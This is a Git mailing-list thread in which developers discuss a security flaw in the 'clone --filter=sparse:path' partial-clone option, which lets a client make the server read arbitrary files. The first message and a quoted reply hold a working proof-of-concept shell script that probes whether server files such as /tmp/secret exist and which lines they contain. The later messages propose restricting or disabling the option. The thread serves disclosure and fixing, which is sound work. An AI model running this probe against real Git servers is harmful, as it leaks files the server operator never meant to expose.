All of lore.kernel.org
 help / color / mirror / Atom feed
* how does "clone --filter=sparse:path" work?
@ 2018-11-08  5:07 Jeff King
  2018-11-08 18:57 ` Jeff Hostetler
  0 siblings, 1 reply; 6+ messages in thread
From: Jeff King @ 2018-11-08  5:07 UTC (permalink / raw)
  To: git; +Cc: Jeff Hostetler, Jonathan Tan, Matthew DeVore

[cc-ing people who worked on or seem interested in partial-clone
filters]

I've been exploring the partial-clone options a bit, and took a look at
the "sparse:path" option. I had some confusion initially, because I
expected it work something like this:

  git clone --filter=sparse:path=Documentation .

But it really doesn't take an in-repo path. You have to specify a path
to a file that contains a file with .gitignore patterns. Except they're
actually _inverted_ patterns (i.e., what to include). Which confused me
again, but I guess makes sense if these are meant to be adapted from
sparse-checkout files.

So my first question is: how is this meant to be used?

I guess the idea is that somebody (the repo admin?) makes a set of
pre-made profiles, with each profile mentioning some subset of paths.
And then when you clone, you say, "I want the foo profile". How is that
profile stored and accessed?

If it's a blob in the repository, I think you can use something like
"--filter=sparse:oid=profiles:foo". And then after cloning, you'd
do "git cat-file blob profiles:foo >.git/sparse-checkout" or similar.
That seems like something that could be wrapped up in a single clone
option, but I can't find one; I won't be surprised if it simply hasn't
happened yet.

But if it's a path, then what? I'd imagine that you'd "somehow" get a
copy of the sparse profile you want out-of-band. And then you'd say "I
want to clone with the profile in this file", and then copy it into the
sparse-checkout file to do the checkout.

But the sparse-checkout file in the filter is not expanded locally, with
patterns sent over the wire. The _filename_ is sent over the wire, and
then upload-pack expands it. So you can't specify an arbitrary set of
patterns; you have to know about the profile names (how?) on the server.
That's not very flexible, though I imagine it may make certain things
easier on the server (e.g., if you pack in such a way to efficiently
serve only particular profiles).

But I'm also concerned it's dangerous. We're reading gitignore patterns
from an arbitrary name on the server's filesystem, with that name coming
from an untrusted client. So I can do:

  git clone --filter=sparse:path=/etc/passwd $remote

and the server will read /etc/passwd. There's probably a lot of mischief
you can get up to with that. Sadly reading /proc/self/mem doesn't work,
because the gitignore code fstat()s the file to find out how much to
read, and the st_size there is 0. But there are probably others
(/proc/kcore is a fun one, but nobody is running their git server as
root, right?).

Below is a proof of concept script that uses this as an oracle to
explore the filesystem, as well as individual lines of files.

Should we simply be disallowing sparse:path filters over upload-pack?

-Peff

-- >8 --
# Set this to host:repo.git to see a real cross-machine connection (which makes
# it more obvious which side is reading which files).  For a simulated local
# one, we'll use --no-local to make sure we really run upload-pack.
SERVER=server.git

# Do these steps manually on the remote side if you're trying it cross-server.
case "$SERVER" in
*:*)
	;;
*)
	# Imagine a server with a repository users can push to, with filters enabled.
	git init -q --bare $SERVER
	git -C $SERVER config uploadpack.allowfilter true

	# Imagine the server has a file outside of the repo we're interested in.
	echo foo >/tmp/secret
	;;
esac

# Some base setup.
git clone -q $SERVER local
git -C local commit -q --allow-empty -m 'some base commit'
git -C local push -q

# We can find out whether a path exists on the filesystem.
probe_file () {
	# The remote upload-pack will barf if it cannot read the path $1.
	rm -rf result
	if git clone --bare --no-local --filter=sparse:path=$1 \
		$SERVER result >/dev/null 2>&1
	then
		echo "$1 exists"
	else
		echo "$1 does not exist"
	fi
}
probe_file /tmp/missing
probe_file /tmp/secret

# We can also check individual lines in a file.
probe_line () {
	# Make a probe that contains the path $2.
	(
		cd local
		echo $2 >$2
		git add $2
		git commit -m "probe for $2"
		git push
	) >/dev/null 2>&1

	# And then fetch that probe with the filter to see
	# if it was included. This needs to be bare so we don't
	# do a followup fetch to checkout.
	rm -rf result
	git clone -q --bare --no-local --filter=sparse:path=$1 \
		$SERVER result

	# We have all the information we need now, but we have to convince Git
	# to tell it to us. There's no way to set fetch_if_missing externally,
	# but we can drop the remote, which means that excluded paths
	# will result in an error.
	git -C result remote rm origin
	if git -C result cat-file -t HEAD:$2 >/dev/null 2>&1
	then
		echo "$1 contains line $2"
	else
		echo "$1 does not contain line $2"
	fi
}
probe_line /tmp/secret foo
probe_line /tmp/secret bar

^ permalink raw reply	[flat|nested] 6+ messages in thread

* Re: how does "clone --filter=sparse:path" work?
  2018-11-08  5:07 how does "clone --filter=sparse:path" work? Jeff King
@ 2018-11-08 18:57 ` Jeff Hostetler
  2018-11-22 17:39   ` Jeff King
  0 siblings, 1 reply; 6+ messages in thread
From: Jeff Hostetler @ 2018-11-08 18:57 UTC (permalink / raw)
  To: Jeff King, git; +Cc: Jeff Hostetler, Jonathan Tan, Matthew DeVore



On 11/8/2018 12:07 AM, Jeff King wrote:
> [cc-ing people who worked on or seem interested in partial-clone
> filters]
> 
> I've been exploring the partial-clone options a bit, and took a look at
> the "sparse:path" option. I had some confusion initially, because I
> expected it work something like this:
> 
>    git clone --filter=sparse:path=Documentation .
> 
> But it really doesn't take an in-repo path. You have to specify a path
> to a file that contains a file with .gitignore patterns. Except they're
> actually _inverted_ patterns (i.e., what to include). Which confused me
> again, but I guess makes sense if these are meant to be adapted from
> sparse-checkout files.
> 
> So my first question is: how is this meant to be used?
> 
> I guess the idea is that somebody (the repo admin?) makes a set of
> pre-made profiles, with each profile mentioning some subset of paths.
> And then when you clone, you say, "I want the foo profile". How is that
> profile stored and accessed?

Yes, the basic idea was if you had a large tree and various groups
of users that tended to only need their group's portion of the tree,
then you could (or your repo admin could) create several profiles.
And users could use a profile to request just the subset of trees and
blobs they need.

During a clone/fetch users could ask for the profile by OID or by
<rev>:<path>.  It would be a local/custom detail where the repo admin
collects the various profiles.  (Or at least, that was the thought.)
Likewise, a user could create their own profile(s) by committing a
sparse-checkout file spec to a personal branch.  Again, a local
convention.


> 
> If it's a blob in the repository, I think you can use something like
> "--filter=sparse:oid=profiles:foo". And then after cloning, you'd
> do "git cat-file blob profiles:foo >.git/sparse-checkout" or similar.
> That seems like something that could be wrapped up in a single clone
> option, but I can't find one; I won't be surprised if it simply hasn't
> happened yet.

Right, TBD.


> 
> But if it's a path, then what? I'd imagine that you'd "somehow" get a
> copy of the sparse profile you want out-of-band. And then you'd say "I
> want to clone with the profile in this file", and then copy it into the
> sparse-checkout file to do the checkout.
> 
> But the sparse-checkout file in the filter is not expanded locally, with
> patterns sent over the wire. The _filename_ is sent over the wire, and
> then upload-pack expands it. So you can't specify an arbitrary set of
> patterns; you have to know about the profile names (how?) on the server.
> That's not very flexible, though I imagine it may make certain things
> easier on the server (e.g., if you pack in such a way to efficiently
> serve only particular profiles).
> 
> But I'm also concerned it's dangerous. We're reading gitignore patterns
> from an arbitrary name on the server's filesystem, with that name coming
> from an untrusted client. So I can do:
> 
>    git clone --filter=sparse:path=/etc/passwd $remote
> 
> and the server will read /etc/passwd. There's probably a lot of mischief
> you can get up to with that. Sadly reading /proc/self/mem doesn't work,
> because the gitignore code fstat()s the file to find out how much to
> read, and the st_size there is 0. But there are probably others
> (/proc/kcore is a fun one, but nobody is running their git server as
> root, right?).
> 
> Below is a proof of concept script that uses this as an oracle to
> explore the filesystem, as well as individual lines of files.
> 
> Should we simply be disallowing sparse:path filters over upload-pack?

The option to allow an absolute path over the wire probably needs more
thought as you suggest.

Having it in the traverse code was useful for local testing in the
client.

But mainly I was thinking of a use case on the client of the form:

     git rev-list
         --objects
         --filter=spec:path=.git/sparse-checkout
         --missing=print
         <commit>

and get a list of the blobs that you don't have and would need before
you could checkout <commit> using the current sparse-checkout 
definition.  You could then have a pre-checkout hook that would bulk
fetch them before starting the actual checkout.  Since that would be
more efficient than demand-loading blobs individually during the
checkout.  There's more work to do in this area, but that was the idea.

But back to your point, yes, I think we should restrict this over the
wire.


Thanks,
Jeff




> 
> -Peff
> 
> -- >8 --
> # Set this to host:repo.git to see a real cross-machine connection (which makes
> # it more obvious which side is reading which files).  For a simulated local
> # one, we'll use --no-local to make sure we really run upload-pack.
> SERVER=server.git
> 
> # Do these steps manually on the remote side if you're trying it cross-server.
> case "$SERVER" in
> *:*)
> 	;;
> *)
> 	# Imagine a server with a repository users can push to, with filters enabled.
> 	git init -q --bare $SERVER
> 	git -C $SERVER config uploadpack.allowfilter true
> 
> 	# Imagine the server has a file outside of the repo we're interested in.
> 	echo foo >/tmp/secret
> 	;;
> esac
> 
> # Some base setup.
> git clone -q $SERVER local
> git -C local commit -q --allow-empty -m 'some base commit'
> git -C local push -q
> 
> # We can find out whether a path exists on the filesystem.
> probe_file () {
> 	# The remote upload-pack will barf if it cannot read the path $1.
> 	rm -rf result
> 	if git clone --bare --no-local --filter=sparse:path=$1 \
> 		$SERVER result >/dev/null 2>&1
> 	then
> 		echo "$1 exists"
> 	else
> 		echo "$1 does not exist"
> 	fi
> }
> probe_file /tmp/missing
> probe_file /tmp/secret
> 
> # We can also check individual lines in a file.
> probe_line () {
> 	# Make a probe that contains the path $2.
> 	(
> 		cd local
> 		echo $2 >$2
> 		git add $2
> 		git commit -m "probe for $2"
> 		git push
> 	) >/dev/null 2>&1
> 
> 	# And then fetch that probe with the filter to see
> 	# if it was included. This needs to be bare so we don't
> 	# do a followup fetch to checkout.
> 	rm -rf result
> 	git clone -q --bare --no-local --filter=sparse:path=$1 \
> 		$SERVER result
> 
> 	# We have all the information we need now, but we have to convince Git
> 	# to tell it to us. There's no way to set fetch_if_missing externally,
> 	# but we can drop the remote, which means that excluded paths
> 	# will result in an error.
> 	git -C result remote rm origin
> 	if git -C result cat-file -t HEAD:$2 >/dev/null 2>&1
> 	then
> 		echo "$1 contains line $2"
> 	else
> 		echo "$1 does not contain line $2"
> 	fi
> }
> probe_line /tmp/secret foo
> probe_line /tmp/secret bar
> 

^ permalink raw reply	[flat|nested] 6+ messages in thread

* Re: how does "clone --filter=sparse:path" work?
  2018-11-08 18:57 ` Jeff Hostetler
@ 2018-11-22 17:39   ` Jeff King
  2019-05-24  8:05     ` Christian Couder
  0 siblings, 1 reply; 6+ messages in thread
From: Jeff King @ 2018-11-22 17:39 UTC (permalink / raw)
  To: Jeff Hostetler; +Cc: git, Jeff Hostetler, Jonathan Tan, Matthew DeVore

On Thu, Nov 08, 2018 at 01:57:52PM -0500, Jeff Hostetler wrote:

> > Should we simply be disallowing sparse:path filters over upload-pack?
> 
> The option to allow an absolute path over the wire probably needs more
> thought as you suggest.
> 
> Having it in the traverse code was useful for local testing in the
> client.
> 
> But mainly I was thinking of a use case on the client of the form:
> 
>     git rev-list
>         --objects
>         --filter=spec:path=.git/sparse-checkout
>         --missing=print
>         <commit>
> 
> and get a list of the blobs that you don't have and would need before
> you could checkout <commit> using the current sparse-checkout definition.
> You could then have a pre-checkout hook that would bulk
> fetch them before starting the actual checkout.  Since that would be
> more efficient than demand-loading blobs individually during the
> checkout.  There's more work to do in this area, but that was the idea.
> 
> But back to your point, yes, I think we should restrict this over the
> wire.

Thanks for your thorough response, and sorry for the slow reply. I had
meant to reply with a patch adding in the restriction, but I haven't
quite gotten to it. :)

It's still on my todo list, but I'm going to be offline for a bit for
vacation, and I didn't want to leave this totally hanging without a
response.

-Peff

^ permalink raw reply	[flat|nested] 6+ messages in thread

* Re: how does "clone --filter=sparse:path" work?
  2018-11-22 17:39   ` Jeff King
@ 2019-05-24  8:05     ` Christian Couder
  2019-05-24  8:31       ` Jeff King
  0 siblings, 1 reply; 6+ messages in thread
From: Christian Couder @ 2019-05-24  8:05 UTC (permalink / raw)
  To: Jeff King
  Cc: Jeff Hostetler, git, Jeff Hostetler, Jonathan Tan, Matthew DeVore

(Sorry for the late reply to this.)

On Sat, Nov 24, 2018 at 8:07 AM Jeff King <peff@peff.net> wrote:
>
> On Thu, Nov 08, 2018 at 01:57:52PM -0500, Jeff Hostetler wrote:
>
> > > Should we simply be disallowing sparse:path filters over upload-pack?

I agree that it should either be disallowed or heavily restricted.

> > The option to allow an absolute path over the wire probably needs more
> > thought as you suggest.
> >
> > Having it in the traverse code was useful for local testing in the
> > client.
> >
> > But mainly I was thinking of a use case on the client of the form:
> >
> >     git rev-list
> >         --objects
> >         --filter=spec:path=.git/sparse-checkout

Do you mean "sparse:path" instead of "spec:path"?

> >         --missing=print
> >         <commit>
> >
> > and get a list of the blobs that you don't have and would need before
> > you could checkout <commit> using the current sparse-checkout definition.
> > You could then have a pre-checkout hook that would bulk
> > fetch them before starting the actual checkout.  Since that would be
> > more efficient than demand-loading blobs individually during the
> > checkout.  There's more work to do in this area, but that was the idea.
> >
> > But back to your point, yes, I think we should restrict this over the
> > wire.
>
> Thanks for your thorough response, and sorry for the slow reply. I had
> meant to reply with a patch adding in the restriction, but I haven't
> quite gotten to it. :)

The way I see it could be restricted is by adding a config option on
the server, maybe called "uploadpack.sparsePathFilter", to tell which
filenames can be accessed using "--filter=sparse:path=".

For example with uploadpack.sparsePathFilter set to
"/home/user/git/sparse/*" and "--filter=sparse:path=foo" then
"/home/user/git/sparse/foo" on the server would be used if it exists.
(Of course care should be taken that things like
"--filter=sparse:path=bar/../../foo" are rejected.)

If uploadpack.sparsePathFilter is unset or set to "false", then
"--filter=sparse:path=<stuff>" would always error out.

Is this what you had in mind?

^ permalink raw reply	[flat|nested] 6+ messages in thread

* Re: how does "clone --filter=sparse:path" work?
  2019-05-24  8:05     ` Christian Couder
@ 2019-05-24  8:31       ` Jeff King
  2019-05-24  9:27         ` Christian Couder
  0 siblings, 1 reply; 6+ messages in thread
From: Jeff King @ 2019-05-24  8:31 UTC (permalink / raw)
  To: Christian Couder
  Cc: Jeff Hostetler, git, Jeff Hostetler, Jonathan Tan, Matthew DeVore

On Fri, May 24, 2019 at 10:05:45AM +0200, Christian Couder wrote:

> (Sorry for the late reply to this.)

No problem. I've been meaning to pick it up again, and somehow it's been
6 months. ;)

> > > But mainly I was thinking of a use case on the client of the form:
> > >
> > >     git rev-list
> > >         --objects
> > >         --filter=spec:path=.git/sparse-checkout
> 
> Do you mean "sparse:path" instead of "spec:path"?

Yes, I think so.

> > > and get a list of the blobs that you don't have and would need before
> > > you could checkout <commit> using the current sparse-checkout definition.
> > > You could then have a pre-checkout hook that would bulk
> > > fetch them before starting the actual checkout.  Since that would be
> > > more efficient than demand-loading blobs individually during the
> > > checkout.  There's more work to do in this area, but that was the idea.
> > >
> > > But back to your point, yes, I think we should restrict this over the
> > > wire.
> >
> > Thanks for your thorough response, and sorry for the slow reply. I had
> > meant to reply with a patch adding in the restriction, but I haven't
> > quite gotten to it. :)
> 
> The way I see it could be restricted is by adding a config option on
> the server, maybe called "uploadpack.sparsePathFilter", to tell which
> filenames can be accessed using "--filter=sparse:path=".
> 
> For example with uploadpack.sparsePathFilter set to
> "/home/user/git/sparse/*" and "--filter=sparse:path=foo" then
> "/home/user/git/sparse/foo" on the server would be used if it exists.
> (Of course care should be taken that things like
> "--filter=sparse:path=bar/../../foo" are rejected.)
> 
> If uploadpack.sparsePathFilter is unset or set to "false", then
> "--filter=sparse:path=<stuff>" would always error out.
> 
> Is this what you had in mind?

My plan had been to disallow it entirely, and allow some mechanism by
which the client could specify the actual set of sparse paths itself
(which it might get from a local file, or communicated in some
out-of-band way to the user cloning, etc).

If we just want a mechanism for the server to provide a pre-made sparse
list, then I think pointing people at sparse:oid=<blob> is simpler
there. I.e., your "foo" becomes "refs/sparse/foo" or even "HEAD:.sparse"
or similar, and the server admin just sticks the content into the repo
instead of dealing with exposing filesystem paths to the client.

-Peff

^ permalink raw reply	[flat|nested] 6+ messages in thread

* Re: how does "clone --filter=sparse:path" work?
  2019-05-24  8:31       ` Jeff King
@ 2019-05-24  9:27         ` Christian Couder
  0 siblings, 0 replies; 6+ messages in thread
From: Christian Couder @ 2019-05-24  9:27 UTC (permalink / raw)
  To: Jeff King
  Cc: Jeff Hostetler, git, Jeff Hostetler, Jonathan Tan, Matthew DeVore

On Fri, May 24, 2019 at 10:31 AM Jeff King <peff@peff.net> wrote:
>
> On Fri, May 24, 2019 at 10:05:45AM +0200, Christian Couder wrote:

> > The way I see it could be restricted is by adding a config option on
> > the server, maybe called "uploadpack.sparsePathFilter", to tell which
> > filenames can be accessed using "--filter=sparse:path=".
> >
> > For example with uploadpack.sparsePathFilter set to
> > "/home/user/git/sparse/*" and "--filter=sparse:path=foo" then
> > "/home/user/git/sparse/foo" on the server would be used if it exists.
> > (Of course care should be taken that things like
> > "--filter=sparse:path=bar/../../foo" are rejected.)
> >
> > If uploadpack.sparsePathFilter is unset or set to "false", then
> > "--filter=sparse:path=<stuff>" would always error out.
> >
> > Is this what you had in mind?
>
> My plan had been to disallow it entirely, and allow some mechanism by
> which the client could specify the actual set of sparse paths itself
> (which it might get from a local file, or communicated in some
> out-of-band way to the user cloning, etc).

I think that indeed disallowing "sparse:path" is the simplest and
safest way to go. And I agree that a "mechanism by which the client
could specify the actual set of sparse paths itself" would be really
nice. I think it might be more complex and take a significant amount
of time to implement though.

> If we just want a mechanism for the server to provide a pre-made sparse
> list, then I think pointing people at sparse:oid=<blob> is simpler
> there. I.e., your "foo" becomes "refs/sparse/foo" or even "HEAD:.sparse"
> or similar, and the server admin just sticks the content into the repo
> instead of dealing with exposing filesystem paths to the client.

I agree that it is simpler to just use "sparse:oid" which already
works. I just thought that some servers might want to provide pre-made
sparse lists that aren't in the repo so that client cannot possibly
change them (by pushing into the repo), and that "sparse:path" could
be used for that purpose.

Now if no one is currently interested in providing pre-made sparse
lists that aren't in the repo, then I am ok to just disable
"sparse:path" for now, and I might send a patch to do it soon. It will
at least fix the security issue with "sparse:path" and thus enable
people interested in using "sparse:oid" to start doing so (without
opening a big security hole).

^ permalink raw reply	[flat|nested] 6+ messages in thread

end of thread, other threads:[~2019-05-24  9:27 UTC | newest]

Thread overview: 6+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2018-11-08  5:07 how does "clone --filter=sparse:path" work? Jeff King
2018-11-08 18:57 ` Jeff Hostetler
2018-11-22 17:39   ` Jeff King
2019-05-24  8:05     ` Christian Couder
2019-05-24  8:31       ` Jeff King
2019-05-24  9:27         ` Christian Couder

This is an external index of several public inboxes,
see mirroring instructions on how to clone and mirror
all data and code used by this external index.